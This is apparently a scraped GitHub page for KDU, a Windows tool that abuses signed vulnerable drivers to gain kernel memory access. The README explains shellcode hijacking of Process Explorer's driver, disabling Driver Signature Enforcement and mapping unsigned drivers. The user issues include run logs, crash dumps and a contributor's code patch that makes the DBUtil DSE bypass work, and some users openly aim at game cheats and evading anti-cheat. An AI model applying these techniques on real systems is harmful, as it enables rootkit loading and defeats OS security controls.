43 Original CVE-2017-9769 File(SHA1): F999709E5B00A68A0F4FA912619FE6548AD0C42D
Authenticode(SHA1): 1AC31466261A6DA69FBEB8E99D0B7B772071AC7F
Page(SHA1): 4EC299E9A539F6BC194BD3D436B24A565BD32EF4
Page(SHA256): C8CE0EE4FF58779A292B5626D9953888A1A04799E18924CB7A075095C25042E8
44 Original CVE-2023-20598 File(SHA1): A24840E32071E0F64E1DFF8CA540604896811587
Authenticode(SHA1): 661A1A28950CEC3F2C3D0E72AB2A05D4A173CF9A
Page(SHA1): 869BED04EB66492AC532E36C3C6171AB34DA1A00
Page(SHA256): E5DC6305227951B05997CD147C59795991F7EDE52461D069EFE1D568DD25C580
45 Original CVE-2020-12928 File(SHA1): 17D28A90EF4D3DBB083371F99943FF938F3B39F6
Authenticode(SHA1): 9A329362E340FC8363E67FB5F23A8391CB83BF00
Page(SHA1): 0BC84A62ABD3CA20305FB834592928C2317439D6
Page(SHA256): 76C7A12CDE2FDC80A6AF0A58E7698FC1F5EC8746EFB461FB07155B7065480715
46 WINIO File(SHA1): AEC96520E85330594D3165C86CB92EAC34C1E095
Authenticode(SHA1): A7179D7CF5EE58276C3C42A16195A0B733F31B53
Page(SHA1): AF7FED1C68BB2D459F7778EC6D20459618CF3D26
Page(SHA256): 490B1FFC374F9CDEC57BBCE9DAD93251516DE93C7A7F3475D8AC55A6DCBB958E
47 Original File(SHA1): DA66B66DCA5EA8689DB903EC23E98F2C881DE6F8
Authenticode(SHA1): A8D16FED8999033126D60C656A3BA359DFAA559F
Page(SHA1): 082FBFF03465F78276D5A2066398A9D3C73DB9AB
Page(SHA256): F677A9447400EAEE6E12A88F59AAADCF6DDF8F16EC8F7612BF50AB378A9B9012
48 RWEverything File(SHA1): 3F6A997B04D2299BA0E9F505803E8D60D0755F44
Authenticode(SHA1): E7FAC017B371A43276E03BF5F71D437E8D377930
Page(SHA1): EE9A5A98C257F2D50030B7F3AB6D7DA805FCC150
Page(SHA256): D159D969E05C83F27F446BCC5F171A0043CC3DF0B518962CEE7ACBE30BCC02F8
49 RWEverything File(SHA1): 6074C2360F5DC74738873A525DFBD67EB6625986
Authenticode(SHA1): 03C523F31603C460076AD549F985DD9533734E95
Page(SHA1): 85B6FC43E943C9EB9B3DE1FF82A56870620CC1CF
Page(SHA256): A3AF7747FAC60B814FA6717B174F1199B9D163081B55AE40CEDD9983B6D033F5
50 RWEverything File(SHA1): 11D7E0D29AB17292FD43BDD5CCB7DA0403E50E52
Authenticode(SHA1): CA06D9FD91F7B681204B35975D5C069D0DABE276
Page(SHA1): B7693E1170B01F24A824892607C2258CA653805A
Page(SHA256): B8776F6889CF3D8252F0912DD9745F8EFF4513292DF2B2B1D484CDBC68FBAE4C
51 RWEverything File(SHA1): B1FAD5DA173C6A603FFFE20E0CB5F0BDCA823BD5
Authenticode(SHA1): 268073AD0B17E2161C1A2A6C5B1BDEBB7B3011B4
Page(SHA1): 0B48F35DAF8B8BC9BA4E413EF222415EAB791AE0
Page(SHA256): B073907634013A8EB65E4C8AA42535BAD08101E58B7B1489AEE395B7BE9C69E2
52 Original File(SHA1): 9E5FCAEA33C9A181C56F7D0E4D9C42F8EDEAD252
Authenticode(SHA1): 7919108CB1278503EC4A78DD25694C6770EAA989
Page(SHA1): E1CE5A5E2CEB0AAD9CB588A900BF471462FAC42B
Page(SHA256): 6991344C8771FC717F878F9A6B0C258BC81FB3BF1F7F3CBED3EF8F86541B253F
*At commit time the data may be inaccurate.

More providers may be added in the future.

How it works

It uses a driver known to be vulnerable (or a wormhole by design) from legitimate software to access arbitrary kernel memory with read/write primitives.

Depending on the command, KDU will either work as TDL/DSEFix or modify kernel-mode process objects (EPROCESS).

In -map mode, for most available providers KDU will by default use the third-party signed driver from Sysinternals Process Explorer and hijack it by placing a small loader shellcode inside its IRP_MJ_DEVICE_CONTROL/IRP_MJ_CREATE/IRP_MJ_CLOSE handler. This is done by overwriting the physical memory where the Process Explorer dispatch handler is located and triggering it by calling the driver's IRP_MJ_CREATE handler (a CreateFile call). Next, the shellcode maps the input driver as a code buffer into kernel mode and runs it with the current IRQL at PASSIVE_LEVEL. After that the hijacked Process Explorer driver is unloaded together with the vulnerable provider driver. This entire idea comes from malicious software of the mid-2000s known as rootkits.

Shellcode versions

KDU uses shellcode to map input drivers and execute their DriverEntry. There are a few shellcode variants embedded in KDU. Shellcode V1, V2 and V3 are used together with a third-party victim driver (Process Explorer by default). They are implemented as a fake driver dispatch entry, and their differences are: V1 uses a newly created system thread to execute code, V2 uses system work items, V3 manually builds a driver object and runs DriverEntry as if the driver had been loaded normally. Shellcode V4 is a simplified version of the previous variants, intended to run not as a driver dispatch entry. While theoretically all "providers" could support all variants, this implementation is limited per provider. You can view the support by typing the -list command and looking at the shellcode support mask. Currently all providers except N21 support the V1, V2 and V3 variants.

Build and Notes

KDU comes with full source code. In order to build from source you need Microsoft Visual Studio 2019 or a later version. For driver builds you need Microsoft Windows Driver Kit 10 or above.

Complete working binaries include: kdu.exe (main executable) and drv64.dll (drivers database). They must reside in the same directory, which must have R/W access enabled for kdu.exe. All binaries MUST BE compiled in the "Release" configuration. In order to use providers that require Microsoft Symbols, you need to put dbghelp.dll and symsrv.dll from the Debugging Tools For Windows into the KDU directory.

Utils and Notes

GenAsIo2Unlock is a special utility used to generate the "unlocking" resource required for working with the AsIO2 driver. The full source of this utility is included in Source\Utils\GenAsIo2Unlock. The compiled version is located in Sources\Hamakaze\Utils\GenAsIo2Unlock.exe. Warning: this utility is set to execute as a post-build event for both Debug and Release configurations. If you don't want to run the precompiled version, replace it with one newly compiled from source. If you remove this post-build event, newly compiled KDU will NOT BE ABLE to use the AsIO2 driver (provider #13).

Reporting bugs and incompatibilities

If you experienced a bug or incompatibility while using KDU with third-party software or the OS, feel free to file an issue. However, if this incompatibility is caused by your own actions, such reports will be ignored. Any BSOD reports should include the minidump attached or your own dump analysis (windbg !analyze -v); issues without this information will be ignored.

Anti-cheat and antimalware incompatibilities will be ignored; that's your own fault.

Disclaimer

Using this program might crash your computer with a BSOD. The compiled binary and source code are provided AS-IS in the hope that they will be useful BUT WITHOUT WARRANTY OF ANY KIND. Since KDU relies on completely bugged and vulnerable drivers, the security of the computer where it is executed may be put at risk. Make sure you understand what you do.

Third party code usage

References

Wormhole drivers code

They are used in multiple products from hardware vendors, mostly in unmodified state. They all break the OS security model and are additionally bugged. Links are for educational purposes, showing how not to write your drivers. Note that the following GitHub account has nothing to do with this code; the code is in unmodified state and provided only for educational purposes.

Authors

(c) 2020 - 2024 KDU Project

Contributors

hfiref0x, lauralex, mihaly044, oicu0619, opsecko


Issues

[Support] Bad image format when trying to map a driver

Hi,
Whenever I try to map a driver, I get a bad image format exception. I've tried with two I've compiled on my home system now. I have sign task off and when I register them as a service using your DSE disable function they load normally. Do I need to enable some other compile-time switch to fit the "driverless" protocol?
Thanks

[!] Bootstrap code size 0x1875 exceeds limit 0x794, abort

C:\Users\caioc\Desktop>kdu -map driver.sys
[#] Kernel Driver Utility v1.2.8 (build 2212) started, (c)2020 - 2022 KDU Project
[#] Build at Fri Dec  9 01:44:47 2022, header checksum 0x7C8AA
[#] Supported x64 OS : Windows 7 and above
[*] Debug Mode Run
[*] CPU vendor string: AuthenticAMD
[*] Windows version: 10.0 build 22000
[*] SecureBoot is enabled on this machine
[*] WHQL enforcement ENABLED
[+] MSFT Driver block list is disabled
[*] Driver mapping using shellcode version: 1
[+] Input driver file "driver.sys" loaded at 0x00007FF6C77D0000
[+] Drivers database "drv64.dll" loaded at 0x00007FFCEAD50000
[+] Firmware type (FirmwareTypeUefi)
[+] Provider: "CVE-2015-2291", Name "NalDrv"
[+] Extracting vulnerable driver as "C:\Users\caioc\Desktop\NalDrv.sys"
[+] Vulnerable driver "NalDrv" loaded
[+] Driver device "NalDrv" has successfully opened
[+] Executing post-open callback for given provider
[+] Driver device security descriptor set successfully
[+] Victim "PROCEXP152" 1 acquire attempt of 3 (max)
[+] Processing victim "Process Explorer" driver
[+] Extracting victim driver "PROCEXP152" as "C:\Windows\system32\drivers\PROCEXP152.sys"
[+] Victim is accepted, handle 0x00000000000000D4
[+] Reading FILE_OBJECT at 0xFFFFC70BB8C872D0
[+] Reading DEVICE_OBJECT at 0xFFFFC70BB2CBCAF0
[+] Reading DRIVER_OBJECT at 0xFFFFC70BB3DB9BF0
[+] Victim IRP_MJ_DEVICE_CONTROL 0xFFFFF803448E2220
[+] Victim DriverUnload 0xFFFFF803448E3280
[+] Loaded ntoskrnl base 0xFFFFF80111C00000
[+] Ntoskrnl.exe mapped at 0x7FF612180000
[+] Resolving kernel import for input driver
[+] Resolving payload import
[!] Bootstrap code size 0x1875 exceeds limit 0x794, abort
[!] Unexpected shellcode procedure size, abort
[!] Error while building shellcode, abort
[+] Victim released
[+] Vulnerable driver "NalDrv" unloaded
[+] Vulnerable driver file removed
[+] Return value: 0. Bye-bye!

Do you have any idea what could be causing this problem?

Windows 11 issues.

I use a modified KDU to load an unsigned kernel driver for my project.

Recently, I got complaints from W11 users: driver loading fails, followed by a BSOD with KMODE_EXCEPTION_NOT_HANDLED; it seems to be caused by the system antivirus.

Can you please check what they changed?

Heavy system load at target driver call

Thanks for the tool, it can help me avoid stupid and non-free fingerprinting, but I need your help.

I wrote a tool to control fans/temps/power distribution for some specific hardware (specific manufacturer).
It uses a kernel driver, so right now it can only work in test mode.
I tried to use your tool, and the current stage is:

  • I can successfully load the driver, initialization is OK.
  • I can access the driver through IO, the operation chain works as well.

The issue is that some IO operations cause heavy system load (interrupts take 50-80% CPU).
They work, but take minutes to an hour on such an unresponsive system.

I'm out of ideas why this happens; direct loading didn't have this issue.

PS: I access the ACPI driver from mine, is this the source of the issue? How can I fix it?

[Information] Microsoft banned Microsoft SysInternals Process Explorer driver

It took them 10+ years and about 4 different APT usages (which I can count/remember) to figure out that something is wrong with it.

A recent update of the WDAC blocklist now blocks all Process Explorer drivers with version <=16.x. Since this driver is used in KDU as well (as victim shellcode placeholder/target), this change will also affect KDU.

The new 17.x Process Explorer driver brings the following "security" improvements:

First, in the IOCTL-callable routine responsible for opening a handle to a given process, it now checks whether the process you want to open is "protected" (PsIsProtectedProcess) and, if it is, sets the access flags to PROCESS_QUERY_LIMITED_INFORMATION.

Second, the routine involving ZwDuplicateObject also got a similar update, not allowing you to duplicate handles of protected processes or PsInitialSystemProcess.

DSE bypass not working on 20H2 after KB5003173 update

The latest Windows update for 20H2, KB5003173, breaks the functionality of the DSE bypass.

Steps to reproduce:

  • Upgrade your OS to the newest version available
  • Run KDU as follows: kdu.exe -dse 0
  • Observe the unchanged code integrity options value

KDU reports success despite the code integrity options value not having been altered. Hence, NtLoadDriver reports STATUS_INVALID_IMAGE_HASH.
I have also checked it using NtQuerySystemInformation(SystemCodeIntegrityInformation... and here's the output of that:

CODEINTEGRITY_OPTION_TESTSIGN=FALSE
CODEINTEGRITY_OPTION_UMCI_ENABLED=FALSE
CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED=FALSE
CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED=FALSE
CODEINTEGRITY_OPTION_TEST_BUILD=FALSE
CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD=FALSE
CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED=FALSE
CODEINTEGRITY_OPTION_FLIGHT_BUILD=FALSE
CODEINTEGRITY_OPTION_FLIGHTING_ENABLED=FALSE
CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED=FALSE
CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED=FALSE
CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED=FALSE
CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED=TRUE

CodeIntegrityOptions=0x2001

I suspect the memory location of the target variable has changed.

Randomly BSOD

Hello hfiref0x, I am testing with a weird issue; let me explain. I have 2 computers, both using the same Windows 10 edition (Professional) and build (the latest), 19041.1023. On the first computer I never get a BSOD, but on the second I get a BSOD some minutes after modifying the CI.DLL value (I always restore the original value). The BSOD error code is CRITICAL_STRUCTURE_CORRUPTION - CI.DLL. This happened to me before; I fixed it by reinstalling Windows with the latest version via USB. Is there any alternative to the reinstall? Thanks.

BSOD with hyper-v turned on in Windows 11 22H2

If I have hyper-v turned on:

bcdedit.exe /set hypervisorlaunchtype auto

provider 0 will BSOD on win11

If I turn hyper-v off it will work without problems:

bcdedit.exe /set hypervisorlaunchtype off

Is it possible to make it work with hyper-v launch?

Does not work with installed Hyper-V

So, I had a BSOD after adding the Hyper-V component of Windows, and kdu works after uninstalling Hyper-V. Is this normal behavior? Or fixable?
used: Win 11 22000.318, -dse command

Unable to re-enable DSE

I have typed the following command in my console: "kdu.exe -prv 1 -dse 6".
After re-entering the same command again (6 replaced with 0),
I was not able to restart my computer without DSE disabled... I have no clue how to re-enable DSE because all the methods I've used (bcdedit.exe /set nointegritychecks off & troubleshoot restart and enable DSE) don't work. Any ideas?

Disabling DSE with the drivers DBUtil v2.3 and v2.5 shows BSOD

Hi hfiref0x,

first, many thanks and much respect for your hard work. It is always nice to see someone skilled releasing sources for others to learn from. This is much appreciated. I myself have used your DSEFix extensively to load unsigned drivers for years. Lately I switched to KDU and got a BSOD on the DBUtil providers. The details and a potential fix follow below.

With the DBUtil v2.3 driver we get a BSOD on Windows 10 and an instant reboot on Windows 7. The problem is related to the function "DbUtilWriteVirtualMemory" in the source code file "KDU-master\Source\Hamakaze\idrv\dbutil.cpp". The size of the structure which DBUtil accepts as input is increased by the following code line:

size = ALIGN_UP_BY(value, PAGE_SIZE);

Because DBUtil v2.3 uses the buffer size specified in DeviceIoControl as the size to transfer, it writes 4096 bytes to the virtual kernel address where the g_CiOptions (Windows 10) or g_CiEnable (Windows 7) variable is located. Because this write occurs on read-only memory we see a BSOD. We corrected this by setting the "size" variable equal to "value" in the source code as follows:

value = FIELD_OFFSET(DBUTIL_READWRITE_REQUEST, Data) + NumberOfBytes;
//size = ALIGN_UP_BY(value, PAGE_SIZE);
size = value;

The same should be implemented for the function "DbUtilReadVirtualMemory", but this does not cause a BSOD, because the memory is only read, not written, for 4096 bytes.

In addition we tested the DBUtil v2.5 driver, which does not even install correctly. This is related to the function "DbUtilManageFiles" in the same source code file. This function first unpacks the driver to the program directory and afterwards extracts the INF and CAT files to the TEMP directory. Therefore the INF cannot find the driver and the installation does not work. We also patched this with the following code change:

//cch = supExpandEnvironmentStrings(L"%temp%\\", szFileName, MAX_PATH);
lstrcpy(szFileName, Context->DriverFileName);
lpEnd = wcsrchr(szFileName, '\\');
*(lpEnd + 1) = 0;
//if (cch == 0 || cch > MAX_PATH) {
// SetLastError(ERROR_NOT_ENOUGH_MEMORY);
//}
//else {

We should implement this patch two times, for the install and the uninstall part of this function. If we only apply the 2nd unpacking patch, we can see that the DBUtil v2.5 driver also causes a BSOD for the same reason as the DBUtil v2.3 driver. Therefore the 1st patch also solves the problem with DBUtil v2.5. After all patches are applied we can change DSE successfully with both providers.

I have attached a fixed and already patched source code file with comments. I hope that helps in fixing the little DBUtil bug.

KDU_dbutil_patched.zip

Keep the amazing stuff coming!
Greets Kai Schtrom
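The size arithmetic behind the patch above, modelled in user-mode C as an added example (not part of this post and not KDU's code): a driver that derives the transfer length from the I/O buffer length will copy a whole page when the caller rounds the request up to PAGE_SIZE, so an 8-byte write to a variable at the end of a writable page spills into the read-only page behind it. The request layout, the two-page memory model, the placement of the variable and the "checking driver" variant are all constructed assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PAGE_SIZE ((size_t)0x1000)
#define ALIGN_UP_BY(v, a) (((v) + ((a) - 1)) & ~((a) - 1))

/* Constructed request layout: a header followed by the bytes to transfer.
 * Only the shape the post's arithmetic relies on (FIELD_OFFSET(..., Data) +
 * NumberOfBytes) is modelled; the real DBUTIL_READWRITE_REQUEST is not. */
typedef struct {
    uint64_t Address;        /* in this model: an offset into MODEL_KERNEL.mem */
    uint32_t NumberOfBytes;  /* what the caller actually wants transferred */
    uint8_t  Data[];         /* payload starts here */
} MODEL_REQUEST;

/* Input buffer size as computed before the fix (rounded up to a page)... */
static size_t request_size_aligned(uint32_t nbytes)
{
    size_t value = offsetof(MODEL_REQUEST, Data) + nbytes;
    return ALIGN_UP_BY(value, PAGE_SIZE);
}

/* ...and after the fix (size = value). */
static size_t request_size_exact(uint32_t nbytes)
{
    return offsetof(MODEL_REQUEST, Data) + nbytes;
}

/* Constructed memory model: a writable page followed by a read-only page.
 * The variable being patched occupies the last bytes of the writable page, so
 * any transfer longer than intended spills into read-only memory. */
typedef struct {
    uint8_t mem[2 * PAGE_SIZE];
    size_t  ro_start;  /* offset where read-only memory begins */
} MODEL_KERNEL;

typedef enum {
    DRIVER_TRUSTS_BUFFER_LENGTH, /* behaviour the post describes for DBUtil v2.3 */
    DRIVER_CHECKS_REQUEST        /* transfer length taken from the validated request */
} DRIVER_MODEL;

/* Returns the number of bytes copied, or -1 when the request is rejected or
 * the write would touch read-only memory (a bug check on a real kernel). */
static long model_driver_write(MODEL_KERNEL *k, DRIVER_MODEL model,
                               const uint8_t *buf, size_t buflen)
{
    const MODEL_REQUEST *req = (const MODEL_REQUEST *)buf;
    size_t hdr = offsetof(MODEL_REQUEST, Data);
    size_t to_copy;

    if (buflen < hdr)
        return -1;

    if (model == DRIVER_TRUSTS_BUFFER_LENGTH) {
        /* Transfer length derived from the I/O buffer size, not the request. */
        to_copy = buflen - hdr;
    } else {
        /* Transfer exactly NumberOfBytes, after checking it fits the buffer. */
        if (req->NumberOfBytes > buflen - hdr)
            return -1;
        to_copy = req->NumberOfBytes;
    }

    if ((size_t)req->Address + to_copy > k->ro_start)
        return -1;  /* would cross into read-only memory */

    memcpy(k->mem + req->Address, req->Data, to_copy);
    return (long)to_copy;
}

/* Build a request carrying `nbytes` payload bytes with the chosen sizing rule,
 * aim it at the last `nbytes` of writable memory, and run the driver model. */
static long simulate_write(int page_aligned_size, DRIVER_MODEL model, uint32_t nbytes)
{
    MODEL_KERNEL *k = calloc(1, sizeof *k);
    size_t size = page_aligned_size ? request_size_aligned(nbytes)
                                    : request_size_exact(nbytes);
    uint8_t *buf = calloc(1, size);
    MODEL_REQUEST *req = (MODEL_REQUEST *)buf;
    long rc;

    k->ro_start = PAGE_SIZE;
    req->Address = k->ro_start - nbytes;
    req->NumberOfBytes = nbytes;
    memset(req->Data, 0xAB, nbytes);  /* constructed payload bytes */

    rc = model_driver_write(k, model, buf, size);
    free(buf);
    free(k);
    return rc;
}

int main(void)
{
    printf("buffer size for an 8-byte write: aligned 0x%zx, exact %zu\n",
           request_size_aligned(8), request_size_exact(8));
    printf("v2.3-style driver: aligned buffer %ld (-1 = fault), exact buffer %ld\n",
           simulate_write(1, DRIVER_TRUSTS_BUFFER_LENGTH, 8),
           simulate_write(0, DRIVER_TRUSTS_BUFFER_LENGTH, 8));
    printf("checking driver, aligned buffer: %ld\n",
           simulate_write(1, DRIVER_CHECKS_REQUEST, 8));
    return 0;
}
```

The exact-size request fixes the symptom on the caller side; the DRIVER_CHECKS_REQUEST variant shows the check the driver itself should have made, which would have made the buffer rounding harmless.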

TYPO README.md

Hello,

In this issue, I have identified two minor typos that need correction.

occured -> occurred README.md L79
expirienced -> experienced README.md L177

Thank you for your time and consideration in addressing these errors.
Best regards,
Melody

Could not load drivers database.

I have been using KDU for a while now and all of a sudden I'm getting this error.
I can't seem to find anything more about this issue besides that it's 0xC000005. It doesn't matter what provider I use.

[Enhancement] Add PassMark LPE-ready driver

Demo for references, https://gist.github.com/hfiref0x/33985b7694c06bc8ee6d8385efadb85e

Driver details:
SHA256, EV certificate, full of bugs and vulnerabilities.
Previously dedicated CVE ids: CVE-2020-15481, CVE-2020-15480

CVE vendor response:
CVE-2020-15480: Ban LSTAR and SYSENTER_EIP_MSR from the readmsr IOCTL.
CVE-2020-15481: disputable CVE. When loaded with PassMark software, the DirectIO driver device, despite having a default SD, will be created with the DO_EXCLUSIVE object flag, thus it won't allow multiple handles and a potential PoC won't work unless they somehow get into the PassMark program address space, which requires elevation or another exploit. PassMark addressed this by regenerating the IOCTL values and leaving everything else as is.

PassMark DirectIO mapping routines for reference https://gist.github.com/hfiref0x/fb822ab89c9f10c46deb172c961ce7bf

Windows crashes after minutes after re-enable DSE

Hi,
I use kdu -dse 0 to disable DSE and then I load my driver (on the first attempt it says the current value is 16 and sets it to 0).
I use kdu -dse 6 to re-enable DSE in less than 30 sec (I tried -dse 16 but it set it to 10).
Everything works perfectly until, after some minutes, the system crashes with a bluescreen.

Event Log says :

The mrxsmb10 service failed to start due to the following error: Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

mrxsmb10 is an unsigned driver from Microsoft itself. How can I avoid this?

Also, out of curiosity, how are those unsigned drivers loaded by Microsoft in the first place? It's like 100+ drivers with no certificate in system32/drivers.

Using WskRegister will definitely BSOD

#include <ntddk.h>
#include <wsk.h>

WSK_REGISTRATION WskRegistration;
WSK_CLIENT_DISPATCH WskDispatch = { MAKE_WSK_VERSION(1,0), 0, NULL };

NTSTATUS RegisterWsk(void)
{
    WSK_CLIENT_NPI WskClient;
    WskClient.ClientContext = NULL;
    WskClient.Dispatch = &WskDispatch;

    // WskRegister returns an NTSTATUS; the original snippet ignored it
    return WskRegister(&WskClient, &WskRegistration);
}

I do not know why...

BSOD KMODE_EXCEPTION_NOT_HANDLED

Hello,
I got a BSOD KMODE_EXCEPTION_NOT_HANDLED
when I -map my driver.
The driver doesn't have any params and the driver unload is set to NULL.
What is the issue?
Thank you

win 11

I can't load/map a driver or use dse on Windows 11.
I got this:

Abort: selected provider does not support HVCI

How to fix it?

DSE

What happens if I don't set dse 0 and dse 6 after mapping the driver?

please teach me

If I try to use PsSetCreateProcessNotifyRoutine, it returns 0xc0000022. If I use WskRegister, it directly blue screens. Is there any solution? Thanks!
The following is part of the dump information:

KMODE_EXCEPTION_NOT_HANDLED (1e)
This is a very common BugCheck. Usually the exception address pinpoints
the driver/function that caused the problem. Always note this address
as well as the link date of the driver/image that contains this address.
Arguments:
Arg1: ffffffffc0000005, The exception code that was not handled
Arg2: 000000000000a13e, The address that the exception occurred at
Arg3: 0000000000000008, Parameter 0 of the exception
Arg4: 000000000000a13e, Parameter 1 of the exception

Debugging Details:

*** WARNING: Unable to verify checksum for win32k.sys

KEY_VALUES_STRING: 1

Key  : Analysis.CPU.mSec
Value: 4624

Key  : Analysis.DebugAnalysisManager
Value: Create

Key  : Analysis.Elapsed.mSec
Value: 10453

Key  : Analysis.Init.CPU.mSec
Value: 562

Key  : Analysis.Init.Elapsed.mSec
Value: 11240

Key  : Analysis.Memory.CommitPeak.Mb
Value: 80

Key  : WER.OS.Branch
Value: vb_release

Key  : WER.OS.Timestamp
Value: 2019-12-06T14:06:00Z

Key  : WER.OS.Version
Value: 10.0.19041.1

BUGCHECK_CODE: 1e

BUGCHECK_P1: ffffffffc0000005

BUGCHECK_P2: a13e

BUGCHECK_P3: 8

BUGCHECK_P4: a13e

WRITE_ADDRESS: fffff8067eafa390: Unable to get MiVisibleState
Unable to get NonPagedPoolStart
Unable to get NonPagedPoolEnd
Unable to get PagedPoolStart
Unable to get PagedPoolEnd
unable to get nt!MmSpecialPagesInUse
000000000000a13e

EXCEPTION_PARAMETER1: 0000000000000008

EXCEPTION_PARAMETER2: 000000000000a13e

BLACKBOXBSD: 1 (!blackboxbsd)

BLACKBOXNTFS: 1 (!blackboxntfs)

BLACKBOXPNP: 1 (!blackboxpnp)

BLACKBOXWINLOGON: 1

CUSTOMER_CRASH_COUNT: 1

PROCESS_NAME: System

TRAP_FRAME: ffff800000000000 -- (.trap 0xffff800000000000)
Unable to read trap frame at ffff8000`00000000

STACK_TEXT:
fffffd8cb9171bf8 fffff8067e259ecb : 000000000000001e ffffffffc0000005 000000000000a13e 0000000000000008 : nt!KeBugCheckEx
fffffd8cb9171c00 fffff8067e2092ac : 0000000000001000 fffffd8cb91724a0 ffff800000000000 0000000000000000 : nt!KiDispatchException+0x17467b
fffffd8cb91722c0 fffff8067e205443 : 0000000000000c10 ffffe91085f6ac10 0000000000000000 000000000a2af350 : nt!KiExceptionDispatch+0x12c
fffffd8cb91724a0 000000000000a13e : ffff9c84f39be413 0000000000000000 0000000000000000 0000000000000000 : nt!KiPageFault+0x443
fffffd8cb9172638 ffff9c84f39be413 : 0000000000000000 0000000000000000 0000000000000000 0000000000000000 : 0xa13e
fffffd8cb9172640 0000000000000000 : 0000000000000000 0000000000000000 0000000000000000 0000000000000000 : 0xffff9c84`f39be413

SYMBOL_NAME: nt!KiDispatchException+17467b

MODULE_NAME: nt

IMAGE_NAME: ntkrnlmp.exe

IMAGE_VERSION: 10.0.19041.1237

STACK_COMMAND: .thread ; .cxr ; kb

BUCKET_ID_FUNC_OFFSET: 17467b

FAILURE_BUCKET_ID: 0x1E_c0000005_nt!KiDispatchException

OS_VERSION: 10.0.19041.1

BUILDLAB_STR: vb_release

OSPLATFORM_TYPE: x64

OSNAME: Windows 10

FAILURE_ID_HASH: {1f8f9473-8a73-d8e8-6f8e-f77ccc1647ea}

Followup: MachineOwner

Unable to load the driver

  • Unable to load vulnerable driver, NTSTATUS (0xC0000603)
    Which stands for STATUS_IMAGE_CERT_REVOKED
    Is there any fix to it? I've been searching for a while but can't find any.
    OS: win11 newest

BSOD while kdu.exe -map mydrv.sys

Hello, hfiref0x. First of all, thank you for your project. It is great.

This is my dump. I used windbg and found that some functions had wrong addresses, such as "MmGetSystemRoutineAddress" or "DbgPrintEx". I think this is probably because the ntoskrnl import is wrong (of course, my guess may not be right 😁).
102022-9578-01.zip

This is the entry of my driver:

#include <ntddk.h>

// Function pointer type matching DbgPrintEx; resolved at run time below
typedef ULONG (*P_DbgPrintEx)(ULONG ComponentId, ULONG Level, PCSTR Format, ...);
static P_DbgPrintEx sys_DbgPrintEx = NULL;

extern "C" NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    UNREFERENCED_PARAMETER(DriverObject);
    UNREFERENCED_PARAMETER(RegistryPath);

    __debugbreak();

    // Direct use of "DbgPrintEx" also goes wrong
    UNICODE_STRING str;
    RtlInitUnicodeString(&str, L"DbgPrintEx");
    sys_DbgPrintEx = (P_DbgPrintEx)MmGetSystemRoutineAddress(&str);
    if (sys_DbgPrintEx != NULL)
        sys_DbgPrintEx(0, 0, "[LysdDrv] LysdDrv DriverEntry start \n");

    return STATUS_UNSUCCESSFUL;
}

But the strange thing is that the other driver just works and its DriverEntry is exactly the same, so I compared their project attributes and changed them to be the same (I swear I checked every attribute very carefully), but helplessly, this one still only blue screens; the other one is normal.

I hope you can help me. Thank you!

vulnerable driver is already loaded

A friend of mine can't load the driver, but for me it works; we use the same Windows version, 22621.1413 Windows 11.

what is the issue here?

Windows 11 22H2 last version

Hello. I tried to enable DSE on Windows 11 22H2 latest version, but I got the error "unable to load vulnerable driver, ntstatus 0xc0000603".
Is it not supported? I disabled Windows Defender.

error

[#] Kernel Driver Utility v1.3.3 (build 2307) started, (c)2020 - 2023 KDU Project
[#] Built at Fri Sep 1 14:29:34 2023, header checksum 0x81FE7
[#] Supported x64 OS : Windows 7 and above
[*] Debug Mode Run, several features (like a shellcode proper generation) will be unavailable
[*] CPU vendor string: AuthenticAMD
[*] Windows version: 10.0 build 22621
[*] SecureBoot is enabled on this machine
[*] WHQL enforcement ENABLED
[+] MSFT Driver block list is disabled
[*] Driver mapping using shellcode version: 1
[+] Input driver file "KernelCheatYT.sys" loaded at 0x00007FF6FE660000
[+] MSFT hypervisor present
[!] Cannot load drivers database, GetLastError 126: The specified module could not be found.
[+] Return value: 0. Bye-bye!

Unable to unload vulnerable driver, NTSTATUS (0xC0000010)

I get this error when I try kdu.exe -dse 6

[#] Kernel Driver Utility v1.2.8 (build 2212) started, (c)2020 - 2022 KDU Project
[#] Build at Fri Dec  9 07:44:47 2022, header checksum 0x4FDEE
[#] Supported x64 OS : Windows 7 and above
[*] CPU vendor string: AuthenticAMD
[*] Windows version: 10.0 build 22621
[*] SecureBoot is disabled on this machine
[+] MSFT Driver block list is disabled
[+] Drivers database "drv64.dll" loaded at 0x00007FF8A1280000
[+] Firmware type (FirmwareTypeUefi)
[+] Provider: "CVE-2015-2291", Name "NalDrv"
[!] Vulnerable driver is already loaded
[+] Driver device "NalDrv" has successfully opened
[+] Executing post-open callback for given provider
[+] Driver device security descriptor set successfully
[+] Module "CI.dll" loaded for pattern search
[!] Could not query DSE state, GetLastError 5
[!] Unable to unload vulnerable driver, NTSTATUS (0xC0000010)
[+] Return value: 0. Bye-bye!

I already tried kdu.exe -prv 0 1 2 3 and others; I changed the provider but it is still the same. Here is the -diag result:


> [#] Kernel Driver Utility v1.2.8 (build 2212) started, (c)2020 - 2022 KDU Project
> [#] Build at Fri Dec  9 07:44:47 2022, header checksum 0x4FDEE
> [#] Supported x64 OS : Windows 7 and above
> [*] CPU vendor string: AuthenticAMD
> [*] Windows version: 10.0 build 22621
> [*] SecureBoot is disabled on this machine
> [+] MSFT Driver block list is disabled
> [+] Running system diagnostics
> > System range start FFFF800000000000
> > Speculation mitigation state flags
>         >> SystemKernelVaShadowInformation
>                 KvaShadowEnabled FALSE
>                 KvaShadowUserGlobal FALSE
>                 KvaShadowPcid FALSE
>                 KvaShadowInvpcid FALSE
>                 KvaShadowRequired FALSE
>                 KvaShadowRequiredAvailable TRUE
>         InvalidPteBit 0
>                 L1DataCacheFlushSupported FALSE
>                 L1TerminalFaultMitigationPresent TRUE
>         >> SystemSpeculationControlInformation
>                 BpbEnabled TRUE
